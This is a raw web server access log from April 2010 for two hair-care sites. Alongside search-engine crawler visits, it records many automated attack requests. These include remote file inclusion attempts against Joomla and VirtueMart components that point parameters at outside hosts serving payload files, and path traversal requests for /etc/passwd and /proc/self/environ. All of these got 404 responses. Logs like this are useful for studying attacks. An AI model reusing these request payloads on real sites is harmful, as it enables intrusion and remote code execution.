67.222.152.66 - - [26/Apr/2010:19:28:58 -0700] "GET /logs/access_100322.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.222.152.66 - - [26/Apr/2010:19:28:59 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.222.152.66 - - [26/Apr/2010:19:28:59 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.222.152.66 - - [26/Apr/2010:19:28:59 -0700] "GET /logs/access_100405.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.222.152.66 - - [26/Apr/2010:19:29:01 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.222.152.66 - - [26/Apr/2010:19:29:01 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.222.152.66 - - [26/Apr/2010:19:29:01 -0700] "GET /logs/access_100405.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.222.152.66 - - [26/Apr/2010:19:29:15 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.222.152.66 - - [26/Apr/2010:19:29:15 -0700] "GET /logs/access_100322.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.222.152.66 - - [26/Apr/2010:19:29:15 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.222.152.66 - - [26/Apr/2010:19:29:33 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.222.152.66 - - [26/Apr/2010:19:29:33 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.222.152.66 - - [26/Apr/2010:19:29:33 -0700] "GET /logs/access_100322.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.222.152.66 - - [26/Apr/2010:19:29:42 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.222.152.66 - - [26/Apr/2010:19:29:42 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.222.152.66 - - [26/Apr/2010:19:29:42 -0700] "GET /logs/access_100322.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.222.152.66 - - [26/Apr/2010:19:33:07 -0700] "GET /logs/access_100315.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.222.152.66 - - [26/Apr/2010:19:33:23 -0700] "GET /logs/access_100315.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.222.152.66 - - [26/Apr/2010:19:33:24 -0700] "GET /logs/access_100315.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
190.120.230.167 - - [26/Apr/2010:19:34:47 -0700] "GET /index.php?option=com_fabrik&Itemid=&mosConfig.absolute.path=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "-" "growlonghairfast.com"
190.120.230.167 - - [26/Apr/2010:19:34:47 -0700] "GET /logs//index.php?option=com_fabrik&Itemid=&mosConfig.absolute.path=./../../../../../../../../etc/passwd%00 HTTP/1.0" 404 - "-" "-" "growlonghairfast.com"
190.120.230.167 - - [26/Apr/2010:19:34:47 -0700] "GET /logs/access_100412.log%20//index.php?option=com_fabrik&Itemid=&mosConfig.absolute.path=./../../../../../../../../etc/passwd%00 HTTP/1.0" 404 - "-" "-" "growlonghairfast.com"
190.120.230.167 - - [26/Apr/2010:19:34:48 -0700] "GET /index.php?option=com_fabrik&Itemid=&mosConfig.absolute.path=./../../../../../../../../etc/passwd HTTP/1.1" 404 - "-" "-" "growlonghairfast.com"
190.120.230.167 - - [26/Apr/2010:19:34:48 -0700] "GET /logs//index.php?option=com_fabrik&Itemid=&mosConfig.absolute.path=./../../../../../../../../etc/passwd HTTP/1.1" 404 - "-" "-" "growlonghairfast.com"
190.120.230.167 - - [26/Apr/2010:19:34:48 -0700] "GET /logs/access_100412.log%20//index.php?option=com_fabrik&Itemid=&mosConfig.absolute.path=./../../../../../../../../etc/passwd HTTP/1.1" 404 - "-" "-" "growlonghairfast.com"
206.80.1.253 - - [26/Apr/2010:19:41:11 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "-" "www.freehairsecrets.com"
206.80.1.253 - - [26/Apr/2010:19:41:11 -0700] "GET / HTTP/1.1" 200 926 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.11) Gecko GranParadiso/3.0.11" "www.freehairsecrets.com"
77.88.25.28 - - [26/Apr/2010:19:42:04 -0700] "GET /freehairsecretsphp/viewtopic.php?p=18926 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
222.236.47.182 - - [26/Apr/2010:19:43:47 -0700] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://takesi.freewebhostx.com/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
222.236.47.182 - - [26/Apr/2010:19:44:11 -0700] "GET /logs/access_100308.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://takesi.freewebhostx.com/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
222.236.47.182 - - [26/Apr/2010:19:44:11 -0700] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://takesi.freewebhostx.com/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
189.78.137.242 - - [26/Apr/2010:19:44:38 -0700] "GET /logs/access.log/send_reminders.php?includedir=http://www.wtsmith.co.uk/media/id.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.freehairsecrets.com"
189.78.137.242 - - [26/Apr/2010:19:44:45 -0700] "GET /send_reminders.php?includedir=http://www.wtsmith.co.uk/media/id.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.freehairsecrets.com"
189.78.137.242 - - [26/Apr/2010:19:44:51 -0700] "GET /logs/send_reminders.php?includedir=http://www.wtsmith.co.uk/media/id.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.freehairsecrets.com"
65.182.191.100 - - [26/Apr/2010:19:46:00 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.811" "www.freehairsecrets.com"
88.217.241.187 - - [26/Apr/2010:19:46:22 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.freehairsecrets.com"
124.49.100.254 - - [26/Apr/2010:19:47:47 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://danangportvn.com:32000//Ckrid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
124.49.100.254 - - [26/Apr/2010:19:47:47 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://danangportvn.com:32000//Ckrid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
124.49.100.254 - - [26/Apr/2010:19:47:47 -0700] "GET /logs/access.log%20%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://danangportvn.com:32000//Ckrid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.88.25.28 - - [26/Apr/2010:19:52:13 -0700] "GET /freehairsecretsphp/viewtopic.php?p=18883 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
77.88.25.28 - - [26/Apr/2010:19:54:42 -0700] "GET /freehairsecretsphp/viewtopic.php?p=13173 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
77.88.25.28 - - [26/Apr/2010:19:58:03 -0700] "GET /freehairsecretsphp/viewtopic.php?p=12300 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
222.236.47.182 - - [26/Apr/2010:19:59:10 -0700] "GET /stubjambo.php?baseDir=http://takesi.freewebhostx.com/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
222.236.47.182 - - [26/Apr/2010:19:59:11 -0700] "GET /stubjambo.php?baseDir=http://takesi.freewebhostx.com/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
222.236.47.182 - - [26/Apr/2010:19:59:42 -0700] "GET /logs//stubjambo.php?baseDir=http://takesi.freewebhostx.com/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
222.236.47.182 - - [26/Apr/2010:19:59:42 -0700] "GET /logs/access_100308.log%20%20//stubjambo.php?baseDir=http://takesi.freewebhostx.com/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
222.236.47.182 - - [26/Apr/2010:19:59:54 -0700] "GET /logs/access_100308.log%20%20//stubjambo.php?baseDir=http://takesi.freewebhostx.com/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
222.236.47.182 - - [26/Apr/2010:19:59:54 -0700] "GET /logs//stubjambo.php?baseDir=http://takesi.freewebhostx.com/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.88.25.28 - - [26/Apr/2010:20:01:26 -0700] "GET /freehairsecretsphp/viewtopic.php?p=13132 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
67.222.152.66 - - [26/Apr/2010:20:01:57 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.222.152.66 - - [26/Apr/2010:20:01:57 -0700] "GET /logs/access_100111.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.222.152.66 - - [26/Apr/2010:20:01:57 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.222.152.66 - - [26/Apr/2010:20:02:42 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.222.152.66 - - [26/Apr/2010:20:02:42 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.222.152.66 - - [26/Apr/2010:20:02:42 -0700] "GET /logs/access_100111.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.222.152.66 - - [26/Apr/2010:20:03:22 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.222.152.66 - - [26/Apr/2010:20:03:22 -0700] "GET /logs/access_091026.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.222.152.66 - - [26/Apr/2010:20:03:22 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.222.152.66 - - [26/Apr/2010:20:03:22 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.222.152.66 - - [26/Apr/2010:20:03:22 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.222.152.66 - - [26/Apr/2010:20:03:22 -0700] "GET /logs/access_091026.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.222.152.66 - - [26/Apr/2010:20:04:10 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.222.152.66 - - [26/Apr/2010:20:04:10 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.222.152.66 - - [26/Apr/2010:20:04:10 -0700] "GET /logs/access_091026.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.222.152.66 - - [26/Apr/2010:20:04:43 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.222.152.66 - - [26/Apr/2010:20:04:43 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.222.152.66 - - [26/Apr/2010:20:04:43 -0700] "GET /logs/access_091026.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.88.25.28 - - [26/Apr/2010:20:04:59 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
67.222.152.66 - - [26/Apr/2010:20:05:03 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.222.152.66 - - [26/Apr/2010:20:05:03 -0700] "GET /logs/access_091026.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.222.152.66 - - [26/Apr/2010:20:05:03 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.222.152.66 - - [26/Apr/2010:20:05:16 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.222.152.66 - - [26/Apr/2010:20:05:16 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.222.152.66 - - [26/Apr/2010:20:05:16 -0700] "GET /logs/access_091026.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
178.93.183.0 - - [26/Apr/2010:20:05:21 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://www.freehairsecrets.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.freehairsecrets.com"
89.111.176.206 - - [26/Apr/2010:20:05:48 -0700] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.ogc.gen.tr/alb.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
178.93.183.0 - - [26/Apr/2010:20:05:51 -0700] "GET / HTTP/1.0" 200 910 "http://www.freehairsecrets.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.freehairsecrets.com"
124.49.100.254 - - [26/Apr/2010:20:06:13 -0700] "GET /logs/access_100419.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://danangportvn.com:32000//Ckrid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.88.25.28 - - [26/Apr/2010:20:07:09 -0700] "GET /freehairsecretsphp/viewtopic.php?p=18892 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
124.49.100.254 - - [26/Apr/2010:20:07:15 -0700] "GET /logs/access_100412.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://danangportvn.com:32000//Ckrid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
213.189.224.16 - - [26/Apr/2010:20:07:52 -0700] "GET /logs/access_100405.log//gallery/captionator.php?GALLERY_BASEDIR=http://come.kr/calendar315/plan/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
213.189.224.16 - - [26/Apr/2010:20:07:52 -0700] "GET /logs//gallery/captionator.php?GALLERY_BASEDIR=http://come.kr/calendar315/plan/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
213.189.224.16 - - [26/Apr/2010:20:07:52 -0700] "GET /gallery/captionator.php?GALLERY_BASEDIR=http://come.kr/calendar315/plan/id1.txt??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.222.152.66 - - [26/Apr/2010:20:10:13 -0700] "GET /logs/access_100419.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.222.152.66 - - [26/Apr/2010:20:10:14 -0700] "GET /logs/access_100419.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.88.25.28 - - [26/Apr/2010:20:10:14 -0700] "GET /freehairsecretsphp/viewtopic.php?p=7604 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
89.111.176.206 - - [26/Apr/2010:20:11:19 -0700] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.ogc.gen.tr/alb.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
67.222.152.66 - - [26/Apr/2010:20:12:25 -0700] "GET /logs/access_100315.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.222.152.66 - - [26/Apr/2010:20:12:57 -0700] "GET /logs/access_100315.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.88.25.28 - - [26/Apr/2010:20:13:31 -0700] "GET /freehairsecretsphp/viewtopic.php?p=13177 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
77.88.25.28 - - [26/Apr/2010:20:16:48 -0700] "GET /freehairsecretsphp/viewtopic.php?p=13802 HTTP/1.0" 200 333 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
213.189.224.16 - - [26/Apr/2010:20:18:28 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
77.88.25.28 - - [26/Apr/2010:20:19:27 -0700] "GET /freehairsecretsphp/viewtopic.php?p=13987 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
77.88.25.28 - - [26/Apr/2010:20:22:17 -0700] "GET /freehairsecretsphp/viewtopic.php?p=14266 HTTP/1.0" 200 333 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
77.88.25.28 - - [26/Apr/2010:20:25:30 -0700] "GET /freehairsecretsphp/viewtopic.php?p=3889 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
208.115.111.245 - - [26/Apr/2010:20:25:49 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "freehairsecrets.com"
77.88.25.28 - - [26/Apr/2010:20:28:50 -0700] "GET /freehairsecretsphp/viewtopic.php?p=13568 HTTP/1.0" 200 333 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
77.88.25.28 - - [26/Apr/2010:20:32:15 -0700] "GET /freehairsecretsphp/viewtopic.php?p=13971 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
89.111.176.206 - - [26/Apr/2010:20:36:23 -0700] "GET /logs/access_100412.log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.ogc.gen.tr/alb.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
89.111.176.206 - - [26/Apr/2010:20:36:23 -0700] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.ogc.gen.tr/alb.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
204.236.252.143 - - [26/Apr/2010:20:38:46 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; spbot/2.0.2; +http://www.seoprofiler.com/bot/ )" "growlonghairfast.com"
204.236.252.143 - - [26/Apr/2010:20:38:48 -0700] "GET /freehairsecretsphp/viewtopic.php?p=2924 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; spbot/2.0.2; +http://www.seoprofiler.com/bot/ )" "growlonghairfast.com"
184.73.26.131 - - [26/Apr/2010:20:46:47 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; spbot/2.0.2; +http://www.seoprofiler.com/bot/ )" "freehairsecrets.com"
184.73.26.131 - - [26/Apr/2010:20:46:49 -0700] "GET /freehairsecretsphp/viewtopic.php?p=4365 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; spbot/2.0.2; +http://www.seoprofiler.com/bot/ )" "freehairsecrets.com"
67.222.152.66 - - [26/Apr/2010:21:01:02 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.222.152.66 - - [26/Apr/2010:21:01:02 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.222.152.66 - - [26/Apr/2010:21:01:02 -0700] "GET /logs/access_091123.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.222.152.66 - - [26/Apr/2010:21:01:02 -0700] "GET /logs/access_091130.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
67.222.152.66 - - [26/Apr/2010:21:01:02 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
67.222.152.66 - - [26/Apr/2010:21:01:02 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
67.222.152.66 - - [26/Apr/2010:21:01:07 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.222.152.66 - - [26/Apr/2010:21:01:07 -0700] "GET /logs/access_091123.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.222.152.66 - - [26/Apr/2010:21:01:07 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.222.152.66 - - [26/Apr/2010:21:01:07 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
67.222.152.66 - - [26/Apr/2010:21:01:07 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
67.222.152.66 - - [26/Apr/2010:21:01:07 -0700] "GET /logs/access_091130.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
66.98.216.61 - - [26/Apr/2010:21:06:18 -0700] "GET /index.php?option=com_extcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
66.98.216.61 - - [26/Apr/2010:21:15:28 -0700] "GET /logs/access_100419.log/index.php?option=com_extcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
66.98.216.61 - - [26/Apr/2010:21:15:28 -0700] "GET /index.php?option=com_extcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
66.98.216.61 - - [26/Apr/2010:21:15:28 -0700] "GET /logs/index.php?option=com_extcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
87.118.118.229 - - [26/Apr/2010:21:21:28 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://growlonghairfast.com/freehairsecretsphp/index.php" "Mozilla/6.0 (compatible; MSIE 7.0a1; Windows NT 5.2; SV1)" "growlonghairfast.com"
